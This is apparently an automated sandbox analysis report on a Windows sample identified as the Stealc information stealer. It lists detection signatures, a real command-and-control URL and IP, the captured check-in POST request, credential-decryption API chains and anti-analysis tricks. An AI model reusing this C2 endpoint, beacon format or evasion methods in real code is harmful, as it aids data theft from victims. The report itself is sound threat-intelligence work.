Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1538205
MD5:ffe1a72c9e5e3aa49aaba14b27f0e4ad
SHA1:ec14b0a1a2d5ed374394f41667084bb1c48307c1
SHA256:315bf34c13238a2fa2f083ecd2bd6f440674ba5b8b5db199c1b35c9724e0e4bb
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5644 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FFE1A72C9E5E3AA49AABA14B27F0E4AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2031125996.0000000005010000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5644JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5644JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.680000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-20T20:13:57.397393+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.680000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0068C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00687240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00687240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00689AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00689AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00689B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00689B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00698EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00698EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00694910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0068DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0068E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00694570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0068ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0068BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006816D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00693EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00693EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068F68A FindFirstFileA,0_2_0068F68A

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 34 35 30 34 37 36 44 44 43 31 33 33 33 32 37 34 33 38 36 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="hwid"A4450476DDC13332743865------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="build"doma------IIJEBFCFIJJJEBGDBAKE--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00684880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00684880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 34 35 30 34 37 36 44 44 43 31 33 33 33 32 37 34 33 38 36 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="hwid"A4450476DDC13332743865------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="build"doma------IIJEBFCFIJJJEBGDBAKE--
                Source: file.exe, 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/-zx3
                Source: file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2075749076.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;Cc3
                Source: file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpWCG3
                Source: file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.2075749076.00000000013D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/z%
                Source: file.exe, 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37o

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B8910_2_00A4B891
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3B0FD0_2_00A3B0FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009608610_2_00960861
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A37A930_2_00A37A93
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2D2FB0_2_00A2D2FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A403B90_2_00A403B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A41B960_2_00A41B96
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3959F0_2_00A3959F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A485350_2_00A48535
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A5D3B0_2_009A5D3B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A43D590_2_00A43D59
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABBEA70_2_00ABBEA7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A49E880_2_00A49E88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3CEEC0_2_00A3CEEC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A44FE30_2_00A44FE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0BF1D0_2_00A0BF1D
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 006845C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: atgdqvtb ZLIB complexity 0.9950946306205728
                Source: file.exe, 00000000.00000003.2031125996.0000000005010000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00699600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00693720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00693720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Y8SNO5KI.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1818624 > 1048576
                Source: file.exeStatic PE information: Raw size of atgdqvtb is bigger than: 0x100000 < 0x195e00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.680000.0.unpack :EW;.rsrc :W;.idata :W; :EW;atgdqvtb:EW;eqelhmzu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;atgdqvtb:EW;eqelhmzu:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00699860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cb7a2 should be: 0x1bd146
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: atgdqvtb
                Source: file.exeStatic PE information: section name: eqelhmzu
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA88BE push ebx; mov dword ptr [esp], ecx0_2_00AA88EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA88BE push 70EA0B0Eh; mov dword ptr [esp], edx0_2_00AA892D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF68B5 push 0C5A8994h; mov dword ptr [esp], esp0_2_00AF68DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E58A3 push ecx; mov dword ptr [esp], 7FEC6239h0_2_008E4CF1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E58A3 push 780179B1h; mov dword ptr [esp], ecx0_2_008E5138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E58A3 push ebx; mov dword ptr [esp], ecx0_2_008E58CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E58A3 push edx; mov dword ptr [esp], 5FF81730h0_2_008E6D93
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E58A3 push 01D306FCh; mov dword ptr [esp], ebp0_2_008E79AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push 3DB85AEDh; mov dword ptr [esp], esi0_2_00A4B8A3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push ecx; mov dword ptr [esp], 76BE915Ah0_2_00A4B941
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push 2D4C639Ch; mov dword ptr [esp], ebx0_2_00A4B980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push ebp; mov dword ptr [esp], esi0_2_00A4B9BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push 78EE40E7h; mov dword ptr [esp], eax0_2_00A4B9D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push 23A0CEE6h; mov dword ptr [esp], ebx0_2_00A4B9FC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push edx; mov dword ptr [esp], 72FF0C50h0_2_00A4BA8B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push eax; mov dword ptr [esp], edx0_2_00A4BB70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push esi; mov dword ptr [esp], 47C9EC7Fh0_2_00A4BC03
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push ebx; mov dword ptr [esp], 3DF65B00h0_2_00A4BC0F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push esi; mov dword ptr [esp], ebp0_2_00A4BC96
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push ebx; mov dword ptr [esp], 2C5CCB4Bh0_2_00A4BCDD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push 0B85CA00h; mov dword ptr [esp], esi0_2_00A4BCEC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push 6DDDD0E3h; mov dword ptr [esp], esp0_2_00A4BD8B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push eax; mov dword ptr [esp], ecx0_2_00A4BE08
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push edx; mov dword ptr [esp], 13F505CFh0_2_00A4BEB8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push ebp; mov dword ptr [esp], ebx0_2_00A4BEDE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push edx; mov dword ptr [esp], ecx0_2_00A4BEF7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push edx; mov dword ptr [esp], 03CF8740h0_2_00A4BF62
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push ebp; mov dword ptr [esp], 30E47224h0_2_00A4BF7B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push ebp; mov dword ptr [esp], edx0_2_00A4BF88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push ecx; mov dword ptr [esp], 7FFE956Bh0_2_00A4BFCF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4B891 push 5D59C3B7h; mov dword ptr [esp], ebx0_2_00A4C015
                Source: file.exeStatic PE information: section name: atgdqvtb entropy: 7.954841029285802

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00699860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13612
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5073B second address: A5074F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BF8E3D56Eh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5074F second address: A50780 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BF9145126h 0x00000008 jmp 00007F0BF914512Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0BF914512Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50780 second address: A50784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50784 second address: A50788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50788 second address: A50798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0BF8E3D56Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50D41 second address: A50D5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145136h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51021 second address: A51036 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0BF8E3D56Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51036 second address: A5103B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
